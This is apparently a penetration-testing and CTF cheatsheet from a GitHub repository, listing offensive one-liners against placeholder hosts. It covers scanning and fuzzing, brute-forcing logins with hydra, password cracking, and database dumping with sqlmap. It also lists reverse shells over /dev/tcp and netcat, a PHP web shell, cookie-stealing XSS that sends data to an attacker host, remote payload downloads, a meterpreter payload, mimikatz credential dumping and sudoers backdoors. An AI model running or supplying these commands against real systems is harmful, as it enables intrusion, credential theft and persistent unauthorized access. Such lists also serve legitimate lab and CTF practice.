-
Notifications
You must be signed in to change notification settings - Fork 0
/
cheatsheet.txt
161 lines (81 loc) · 4.48 KB
/
cheatsheet.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
sudo rustscan {rhost} -t 500 -b 1500 -- -A
sudo nmap -sC -sV -A {rhost}
sudo nmap -sS -T5 -A -f -v {rhost} -Pn -o nmap.log
gobuster dir -u http://{rhost} -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 50
gobuster dir -u http://{rhost} -w /usr/share/dirb/wordlists/common.txt -t 50
gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://{rhost}/ -x php,txt,html
gobuster dir -u http://{rhost} -w /usr/share/SecLists/Discovery/Web-Content/common.txt -t 50 -x .txt,.html,.php
gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://{rhost}/ -t 50
ffuf -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://{rhost}/FUZZ -t 50
ffuf -c -w /usr/share/dirb/wordlists/common.txt -u http://{rhost}/FUZZ -t 50
ffuf -c -w /usr/share/dirb/wordlists/common.txt -u http://{rhost}/ -e php,txt,html
ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/common.txt -t 50 -e .txt,.html,.php -u http://{rhost}/FUZZ
ffuf -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -t 50 -u http://FUZZ.{rhost}
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt file.zip
hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt
hashcat -m 1800 hash --show
hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt
sudo zip2john backup.zip > hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash
/usr/share/john/ssh2john.py id_rsa > hash
rdesktop {rhost}
xfreerdp /u:user /p:pass /v:{rhost}
xfreerdp /d:domain /u:user /p:pass /v:{rhost}
certutil -urlcache -f http://{lhost}/file file
hydra -l user -P /usr/share/wordlists/rockyou.txt -f {rhost} http-get -t 16
hydra -l user -P /usr/share/wordlists/rockyou.txt {rhost} -t 4 ftp -V
hydra -l user -P /usr/share/wordlists/rockyou.txt {rhost} -t 4 ssh -V
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://{rhost}:{rport} -t 4 -V
hydra -l admin -P /usr/share/wordlists/rockyou.txt {rhost} http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid" -V
hydra {rhost} -s {rport} -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P r/usr/share/wordlists/rockyou.txt
mysql -h {rhost} -uroot -p
sqlmap -u http://{rhost} --forms --batch --dump
sqlmap -r req.txt --batch --dump
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
smbclient //{rhost}/Data
smbclient -L {rhost} -U "user"
wpscan --url http://{rhost}/ --enumerate t --enumerate p --enumerate u
wpscan --url http://{rhost} -e u
wpscan --url http://{rhost} -e ap
wpscan --url http://{rhost} --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
find / -perm -4000 2> /dev/null
find / -perm -u=s 2> /dev/null
find / -user user -perm -4000 -print 2> /dev/null
find / -user user -print 2> /dev/null
find / -perm -u=s -type f 2> /dev/null
find / 2> /dev/null | grep -i flag
find / -type f -user www-data
find / -type f -name root.txt 2> /dev/null
find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>> /dev/null
find / -name *.txt 2> /dev/null
find / -type f -name "flag.*" 2> /dev/null
find / -type -f -name "*.log" 2> /dev/null
find / -type f -name "*.bak" 2> /dev/null
ssh -L 9001:127.0.0.1:9001 -i id_rsa user@{rhost}
cat id_rsa.pub >> authorization_keys
scp -P {lport} user@{lhost}:/home/user/exploit /home/kali/tryhackme
sudo -u#-1 /bin/bash
cat /etc/crontab
steghide extract -sf file.jpg
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"); ?>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f
<script>alert(document.cookie)</script>
<script>document.location='http://{lhost}:{lport}/?cookie='+document.cookie</script>
php://filter/convert.base64-encode/resource=index
<?php file_put_contents('php-reverse-shell.php',file_get_contents('http://{lhost}/php-reverse-shell.php')); ?>
powershell -ep bypass
Invoke-ShareFinder
Get-NetComputer -fulldata | select operatingsystem
privilege::debug
lsadump::lsa /patch
msfvenom -p windows/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe -o shell.exe
meterpreter > load kiwi
python2 creddump7/pwdump.py SYSTEM SAM
getcap -r / 2>/dev/null
echo "user ALL=(ALL:ALL) ALL" >> /etc/sudoers;
echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers;
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
<?php system($_GET['cmd']);?>
searchsploit -m file
ssh user@{rhost} -t "bash --noprofile"